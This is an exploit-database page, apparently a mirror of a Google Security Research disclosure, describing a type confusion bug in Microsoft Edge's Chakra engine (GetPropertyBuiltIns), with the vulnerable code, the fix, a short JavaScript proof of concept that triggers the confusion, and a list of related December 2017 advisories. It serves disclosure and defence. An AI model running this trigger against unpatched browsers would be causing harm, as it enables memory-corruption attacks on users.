Lucene search
Google Security ResearchEDB-ID:43713HistoryJan 17, 2018 - 12:00 a.m.
Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion
2018-01-1700:00:00
Google Security Research
www.exploit-db.com
23
AI Score
7.4
Confidence
Low
/*
Here's a snippet of the method.
bool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result)
{
if (propertyId == PropertyIds::length)
{
...
int len = 0;
Var varLength;
if (scriptFunction->GetProperty(scriptFunction, PropertyIds::length, &varLength, NULL, requestContext))
{
len = JavascriptConversion::ToInt32(varLength, requestContext);
}
...
return true;
}
return false;
}
"JavascriptGeneratorFunction" is like a wrapper class used to ensure the arguments for "scriptFunction". So "scriptFunction" must not be exposed to user JavaScript code. But the vulnerable method exposes "scriptFunction" as "this" when getting the "length" property.
The code should be like: "scriptFunction->GetProperty(this, PropertyIds::length, &varLength, NULL, requestContext);"
Type confusion PoC:
*/
function* f() {
}
let g;
f.__defineGetter__('length', function () {
g = this; // g == "scriptFunction"
});
f.length;
g.call(0x1234, 0x5678); // type confusionRelated
packetstorm
packetstorm
zdt
zdt
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2017-12-12 08:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11914)
2017-12-12 00:00:00
seebug
seebug
symantec
symantec
osv
osv
CVE-2017-11930
2017-12-12 21:29:01
CVE-2017-11894
2017-12-12 21:29:01
ChakraCore RCE Vulnerability
2022-05-17 00:11:39
veracode
veracode
Privilege Escalation
2018-07-05 05:13:18
Remote Code Execution (RCE) Via Memory Corruption
2018-07-04 07:53:08
Remote Code Execution (RCE)
2018-07-04 08:51:17
nvd
nvd
cvelist
cvelist
prion
prion
Memory corruption
2017-12-12 21:29:00
Memory corruption
2017-12-12 21:29:00
Memory corruption
2017-12-12 21:29:00
cve
cve
github
github
ChakraCore RCE Vulnerability
2022-05-17 00:11:58
ChakraCore vulnerable to remote code execution
2022-05-14 01:06:50
ChakraCore RCE Vulnerability
2022-05-17 00:11:39
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4053580)
2017-12-13 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4053579)
2017-12-13 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4053578)
2017-12-13 00:00:00
nessus
nessus
KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update
2017-12-12 00:00:00
KB4053580: Windows 10 Version 1703 December 2017 Security Update
2017-12-12 00:00:00
KB4053578: Windows 10 Version 1511 December 2017 Security Update
2017-12-12 00:00:00
kaspersky
kaspersky
KLA11158 Multiple vunlerabilities in Microsoft Browsers
2017-12-12 00:00:00
mskb
mskb
December 12, 2017âKB4053579 (OS Build 14393.1944)
2017-12-12 08:00:00
December 12, 2017âKB4053580 (OS Build 15063.786)
2017-12-12 08:00:00
December 12, 2017âKB4053578 (OS Build 10586.1295)
2017-12-12 08:00:00
trendmicroblog
trendmicroblog
talosblog
talosblog
Microsoft Patch Tuesday - December 2017
2017-12-12 15:32:00